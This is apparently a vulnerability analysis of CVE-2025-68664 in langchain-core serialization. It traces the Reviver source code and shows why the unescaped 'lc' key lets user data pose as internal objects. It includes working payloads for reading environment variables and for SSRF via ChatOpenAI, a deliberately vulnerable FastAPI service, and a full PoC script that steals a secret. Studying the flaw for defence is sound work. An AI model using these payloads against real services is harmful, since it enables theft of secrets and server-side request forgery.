LangChain serialization: CVE-2025-68664

Affected versions

langchain-core < 0.3.81

langchain-core >= 1.0.0 and < 1.2.5

Summary

The issue lives in the following module:

from langchain_core.load import dumps, dumpd, load, loads

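The dumps() and dumpd() functions do not escape the lc key when they process dictionary objects.

This key is reserved for internal use. If a user adds it by hand, the dictionary can pass itself off as an internal serialized object,

which enables operations such as stealing environment variables.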
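To make the missing-escape problem concrete, here is a minimal stdlib-only sketch. It is a toy model, not langchain-core code: `toy_dumps`, `toy_loads`, and `toy_hook` are hypothetical names, and the hook only mimics the idea that any dictionary carrying the reserved `lc` key is treated as an internal marker.

```python
import json

RESERVED_KEY = "lc"  # the reserved marker key discussed above


def toy_dumps(obj):
    """Toy serializer (hypothetical): user dicts are written out unchanged,
    so a user-supplied reserved key is not escaped."""
    return json.dumps(obj)


def toy_hook(d):
    """Toy reviver (hypothetical): any dict carrying the reserved key is
    treated as an internal marker, no matter who produced it."""
    if d.get(RESERVED_KEY) == 1 and d.get("type") == "secret":
        return f"<internal secret lookup for {d['id'][0]}>"
    return d


def toy_loads(text):
    return json.loads(text, object_hook=toy_hook)


# User-controlled data that imitates an internal marker.
user_data = {"note": {"lc": 1, "type": "secret", "id": ["API_SECRET"]}}
restored = toy_loads(toy_dumps(user_data))
print(restored)
```

Because the serializer writes the user dictionary out verbatim, the loader cannot tell it apart from a marker that the serializer itself would have produced.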

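Debugging analysis / source logic

Start debugging from loads.

It is clear that the lc key in the dictionary that passed through dumpd() was not escaped.

Execution first steps into the beta() decorator. This is not important; just step in again when it returns to the outer call.

This brings us to the loads() function itself: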

@beta()
def loads(
    text: str,
    *,
    secrets_map: Optional[dict[str, str]] = None,
    valid_namespaces: Optional[list[str]] = None,
    secrets_from_env: bool = True,
    additional_import_mappings: Optional[dict[tuple[str, ...], tuple[str, ...]]] = None,
    ignore_unserializable_fields: bool = False,
) -> Any:

    return json.loads(
        text,
        object_hook=Reviver(
            secrets_map,
            valid_namespaces,
            secrets_from_env,
            additional_import_mappings,
            ignore_unserializable_fields=ignore_unserializable_fields,
        ),
    )

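The body of loads is a single json.loads call.

The first argument is the JSON-formatted string to be decoded into a JSON object (a dictionary).

The second argument, object_hook, is a callable that receives each JSON object decoded from text and post-processes it.

A simple script can be used to test this process: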

import json

obj_text = "{\"a\": 123, \"b\": 1234}"

class Test:
    def __init__(self, a, b):
        self.a = a
        self.b = b

    def __repr__(self):
        return f"<Test a={self.a} b={self.b}>"

def user_decoder(d):
    if 'a' in d and 'b' in d:
        return Test(d['a'], d['b'])
    return d

print(json.loads(obj_text, object_hook=user_decoder))
# <Test a=123 b=1234>
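One detail matters for the rest of the analysis: json.loads calls object_hook once for every JSON object in the text, innermost objects first. The following sketch records the call order; `recording_hook` and the sample text are made up for illustration.

```python
import json

calls = []


def recording_hook(d):
    """Record every dict that json.loads hands to the hook, then pass it on."""
    calls.append(dict(d))
    return d


text = '{"outer": {"inner": {"x": 1}}, "y": 2}'
json.loads(text, object_hook=recording_hook)

# Print the dictionaries in the order the hook received them.
for i, seen in enumerate(calls, 1):
    print(i, seen)
```

The innermost dictionary reaches the hook before its parents do, so a marker-shaped dictionary buried deep inside user data is still processed.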

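Note that object_hook only needs to be a callable; it does not have to be a function.

So passing an instance of a class that implements the __call__ magic method works,

and so does passing a class itself, in which case its __init__ constructor receives the dictionary.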
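Both callable forms can be checked with a short script. The class names `CallableHook` and `Wrapper` are hypothetical and exist only for this demonstration.

```python
import json


class CallableHook:
    """An instance is callable because the class defines __call__."""

    def __call__(self, d):
        return sorted(d)  # return the sorted key names of the decoded dict


class Wrapper:
    """Passing the class itself works because calling a class runs __init__."""

    def __init__(self, d):
        self.data = d

    def __repr__(self):
        return f"Wrapper({self.data})"


text = '{"b": 1, "a": 2}'
via_instance = json.loads(text, object_hook=CallableHook())  # instance with __call__
via_class = json.loads(text, object_hook=Wrapper)            # the class object itself
print(via_instance)
print(via_class)
```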

Now back to this piece of code in loads:

return json.loads(
    text,
    object_hook=Reviver(
        secrets_map,
        valid_namespaces,
        secrets_from_env,
        additional_import_mappings,
        ignore_unserializable_fields=ignore_unserializable_fields,
    ),
)

A Reviver instance has already been constructed here,

so object_hook is effectively the Reviver.__call__ method.

Stepping through json.loads, we can see this method being invoked:

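After passing through Reviver, our original dictionary object has been replaced by the value read from the environment variable:

Set a breakpoint directly inside the __call__ method that we care about,

and the environment-variable lookup shows up:

Here os.environ contains the variables that the Python process copied from the system environment at startup,

plus any variables set manually inside the program.

Looking at the full source, the logic is easy to follow: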
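The behaviour of os.environ described here is easy to confirm. In this sketch the variable names `DEMO_IN_PROCESS_SECRET` and `DEMO_EMPTY` are made up for illustration.

```python
import os

# A variable set inside the running process (hypothetical name).
os.environ["DEMO_IN_PROCESS_SECRET"] = "set-at-runtime"

# Inherited variables and variables set at runtime are read through
# the same mapping.
print("DEMO_IN_PROCESS_SECRET" in os.environ)
print(os.environ["DEMO_IN_PROCESS_SECRET"])

# An empty value fails a check of the form
# `key in os.environ and os.environ[key]`.
os.environ["DEMO_EMPTY"] = ""
found = "DEMO_EMPTY" in os.environ and bool(os.environ["DEMO_EMPTY"])
print(found)
```

A secret that the application assigns to os.environ at runtime is therefore just as reachable as one inherited from the shell.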

def __call__(self, value: dict[str, Any]) -> Any:
    if (
        value.get("lc") == 1
        and value.get("type") == "secret"
        and value.get("id") is not None
    ):
        [key] = value["id"]
        if key in self.secrets_map:
            return self.secrets_map[key]
        if self.secrets_from_env and key in os.environ and os.environ[key]:
            return os.environ[key]
        return None

    if (
        value.get("lc") == 1
        and value.get("type") == "not_implemented"
        and value.get("id") is not None
    ):
        if self.ignore_unserializable_fields:
            return None
        msg = (
            "Trying to load an object that doesn't implement "
            f"serialization: {value}"
        )
        raise NotImplementedError(msg)

    if (
        value.get("lc") == 1
        and value.get("type") == "constructor"
        and value.get("id") is not None
    ):
        [*namespace, name] = value["id"]
        mapping_key = tuple(value["id"])

        if (
            namespace[0] not in self.valid_namespaces
            # The root namespace ["langchain"] is not a valid identifier.
            or namespace == ["langchain"]
        ):
            msg = f"Invalid namespace: {value}"
            raise ValueError(msg)
        # Has explicit import path.
        if mapping_key in self.import_mappings:
            import_path = self.import_mappings[mapping_key]
            # Split into module and name
            import_dir, name = import_path[:-1], import_path[-1]
            # Import module
            mod = importlib.import_module(".".join(import_dir))
        elif namespace[0] in DISALLOW_LOAD_FROM_PATH:
            msg = (
                "Trying to deserialize something that cannot "
                "be deserialized in current version of langchain-core: "
                f"{mapping_key}."
            )
            raise ValueError(msg)
        # Otherwise, treat namespace as path.
        else:
            mod = importlib.import_module(".".join(namespace))

        cls = getattr(mod, name)

        # The class must be a subclass of Serializable.
        if not issubclass(cls, Serializable):
            msg = f"Invalid namespace: {value}"
            raise ValueError(msg)

        # We don't need to recurse on kwargs
        # as json.loads will do that for us.
        kwargs = value.get("kwargs", {})
        return cls(**kwargs)

    return value
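The secret branch can be exercised in isolation with the standard library alone. The sketch below copies only that branch from the listing above into a hypothetical `revive_secret` function. It is not the library's Reviver, and `DEMO_API_SECRET` is a made-up variable name.

```python
import json
import os


def revive_secret(value, secrets_map=None, secrets_from_env=True):
    """Stand-in for the `secret` branch of the listing above (hypothetical helper)."""
    secrets_map = secrets_map or {}
    if (
        value.get("lc") == 1
        and value.get("type") == "secret"
        and value.get("id") is not None
    ):
        [key] = value["id"]  # the id list must hold exactly one name
        if key in secrets_map:
            return secrets_map[key]
        if secrets_from_env and key in os.environ and os.environ[key]:
            return os.environ[key]
        return None
    return value


os.environ["DEMO_API_SECRET"] = "demo-value"
text = '{"extra": {"lc": 1, "type": "secret", "id": ["DEMO_API_SECRET"]}}'

# With the environment fallback enabled, the nested dict becomes the value.
with_env = json.loads(text, object_hook=revive_secret)
# With the fallback disabled, the same dict is revived as None.
without_env = json.loads(
    text, object_hook=lambda d: revive_secret(d, secrets_from_env=False)
)
print(with_env)
print(without_env)
```

In this sketch, the only thing separating the two results is the `secrets_from_env` flag, which defaults to True in the loads signature shown earlier.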

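Note that there are two more types we have not used yet.

not_implemented exists only for error tolerance and is of no use here.

constructor is far more interesting: it can instantiate classes from LangChain's allowlisted namespaces.

The default allowlist is: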

DEFAULT_NAMESPACES = [
    "langchain",
    "langchain_core",
    "langchain_community",
    "langchain_anthropic",
    "langchain_groq",
    "langchain_google_genai",
    "langchain_aws",
    "langchain_openai",
    "langchain_google_vertexai",
    "langchain_mistralai",
    "langchain_fireworks",
    "langchain_xai",
    "langchain_sambanova",
    "langchain_perplexity",
]

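The most useful namespace would be langchain_community, which contains many tools that can execute code, read files, perform SSRF, and so on.

Unfortunately, it is on the blocklist: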

DISALLOW_LOAD_FROM_PATH = [
    "langchain_community",
    "langchain",
]
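How the two lists combine can be sketched as a small decision function that mirrors the checks in the constructor branch of __call__. `check_constructor_id` is a hypothetical helper. The explicit import-mapping table is left empty here, which is an assumption for illustration since the real table is not reproduced. The Serializable subclass check is also omitted, and the langchain_community id below uses placeholder module and class names.

```python
DEFAULT_NAMESPACES = [
    "langchain", "langchain_core", "langchain_community", "langchain_anthropic",
    "langchain_groq", "langchain_google_genai", "langchain_aws",
    "langchain_openai", "langchain_google_vertexai", "langchain_mistralai",
    "langchain_fireworks", "langchain_xai", "langchain_sambanova",
    "langchain_perplexity",
]
DISALLOW_LOAD_FROM_PATH = ["langchain_community", "langchain"]


def check_constructor_id(lc_id, import_mappings=None):
    """Describe how the namespace checks would treat lc_id (hypothetical helper)."""
    import_mappings = import_mappings or {}  # assumption: no explicit mappings
    *namespace, name = lc_id
    if namespace[0] not in DEFAULT_NAMESPACES or namespace == ["langchain"]:
        return "rejected: invalid namespace"
    if tuple(lc_id) in import_mappings:
        return "allowed: explicit import mapping"
    if namespace[0] in DISALLOW_LOAD_FROM_PATH:
        return "rejected: cannot be loaded from path"
    return "allowed: namespace used as import path"


openai_result = check_constructor_id(
    ["langchain_openai", "chat_models", "base", "ChatOpenAI"]
)
community_result = check_constructor_id(
    ["langchain_community", "some_module", "SomeTool"]  # placeholder names
)
other_result = check_constructor_id(["os", "system"])
print(openai_result)
print(community_result)
print(other_result)
```

Under these assumptions, an allowlisted namespace that is also in DISALLOW_LOAD_FROM_PATH is only reachable through an explicit mapping entry, never through its raw module path.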

Other avenues are somewhat more limited. For example, to attempt SSRF through langchain_openai,

construct this payload:

{
    "lc": 1,
    "type": "constructor",
    "id": ["langchain_openai", "chat_models", "base", "ChatOpenAI"],
    "kwargs": {
        "openai_api_key": "sk-ssrf-test-key",
        "base_url": "http://127.0.0.1:8080",
        "max_retries": 1,
        "temperature": 0
    }
}

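Instantiation alone does not trigger a request.

The target service would additionally have to call the invoke method on the revived langchain_openai object,

and a service is unlikely to contain logic like this on its own: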

restored_obj = loads(json_str)
response = restored_obj.invoke("Hello, are you there?")

However, if the service really is written this way, the request does arrive and a response comes back:

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
127.0.0.1 - - [03/Jan/2026 19:14:40] "POST /chat/completions HTTP/1.1" 404 -
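To observe such a request locally, a small listener is enough. The sketch below uses only the standard library and is not the server that produced the output above. The urllib call merely stands in for the request an invoked client would send to base_url, and `RecordingHandler` is a hypothetical name.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

seen_requests = []  # (method, path) pairs observed by the listener


class RecordingHandler(BaseHTTPRequestHandler):
    """Record each POST and answer 404, similar to the log line above."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        self.rfile.read(length)  # drain the request body
        seen_requests.append((self.command, self.path))
        self.send_response(404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the demo quiet


server = HTTPServer(("127.0.0.1", 0), RecordingHandler)  # port 0: pick a free port
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# Stand-in for the client request; proxies are disabled for the local call.
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
req = urllib.request.Request(
    f"http://127.0.0.1:{port}/chat/completions", data=b"{}", method="POST"
)
try:
    opener.open(req, timeout=5)
    status = 200
except urllib.error.HTTPError as exc:
    status = exc.code

server.shutdown()
server.server_close()
print(status, seen_requests)
```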

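Real-world scenario reproduction

When exploiting this vulnerability in practice, we cannot call the target service's loads function directly.

Exploitation depends on when each service calls loads on its own.

Take this service as an example: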

import json
import os
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
from typing import Any, Dict, List

from langchain_core.messages import HumanMessage, AIMessage
from langchain_core.load import dumpd, load

app = FastAPI()

DB_FILE = "chat_history.json"

if not os.path.exists(DB_FILE):
    with open(DB_FILE, "w") as f:
        json.dump([], f)

class ChatInput(BaseModel):
    message: str
    metadata: Dict[str, Any] = {}

@app.post("/send_message")
def send_message(chat_input: ChatInput):
    # User-controlled metadata goes straight into additional_kwargs.
    msg = HumanMessage(content=chat_input.message, additional_kwargs=chat_input.metadata)

    serialized_msg = dumpd(msg)

    with open(DB_FILE, "r+") as f:
        history = json.load(f)
        history.append(serialized_msg)
        f.seek(0)
        json.dump(history, f)

    return {"status": "Message saved", "serialized_data": serialized_msg}

@app.get("/get_history")
def get_history():
    try:
        with open(DB_FILE, "r") as f:
            history_data = json.load(f)

        restored_messages = []
        for item in history_data:
            # Stored records are deserialized here.
            obj = load(item)
            restored_messages.append(obj)

        return {"history": str(restored_messages)}
    except Exception as e:
        return {"error": str(e), "message": "Deserialization failed"}


os.environ["API_SECRET"] = "Flag{Real_World_Attack_Success}"

if __name__ == "__main__":
    import uvicorn
    print("[*] Server starting...")
    print("[*] Target secret: API_SECRET")
    uvicorn.run(app, host="127.0.0.1", port=8000)

Using the vulnerability analyzed above, we can write the following PoC to carry out the attack:

import requests
import json

url = "http://127.0.0.1:8000/send_message"

payload = {
    "message": "Hello, this is an ordinary message",
    "metadata": {
        "my_hack": {
            "lc": 1,
            "type": "secret",
            "id": ["API_SECRET"]
        }
    }
}

print("[*] 1. Sending the malicious message (planting the payload)...")
response = requests.post(url, json=payload)
print(f"Server response: {response.json()}")

print("\n[*] 2. Triggering the history read (detonating the payload)...")
trigger_url = "http://127.0.0.1:8000/get_history"
trigger_response = requests.get(trigger_url)

print("[-] History returned by the server:")

print(trigger_response.text)